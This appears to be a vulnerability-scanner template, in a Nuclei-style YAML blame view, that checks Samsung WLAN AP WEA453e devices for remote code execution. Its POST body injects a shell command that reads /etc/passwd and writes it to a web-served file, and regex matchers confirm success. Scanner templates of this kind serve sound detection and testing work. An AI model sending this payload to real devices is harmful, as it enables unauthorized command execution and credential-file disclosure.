2021-02-15 06:17:07 +00:00
|
|
|
id: samsung-wlan-ap-rce
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Samsung Wlan AP (WEA453e) RCE
|
|
|
|
author: pikpikcu
|
|
|
|
severity: critical
|
|
|
|
reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
|
2021-02-15 15:59:12 +00:00
|
|
|
tags: xss,samsung,rce
|
2021-02-15 06:17:07 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: POST
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/(download)/tmp/poc.txt"
|
|
|
|
body: "command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2021-07-24 21:35:55 +00:00
|
|
|
- "root:.*:0:0"
|
|
|
|
- "bin:.*:1:1"
|
2021-02-15 06:17:07 +00:00
|
|
|
part: body
|
2021-07-24 21:35:55 +00:00
|
|
|
|
2021-02-15 06:17:07 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|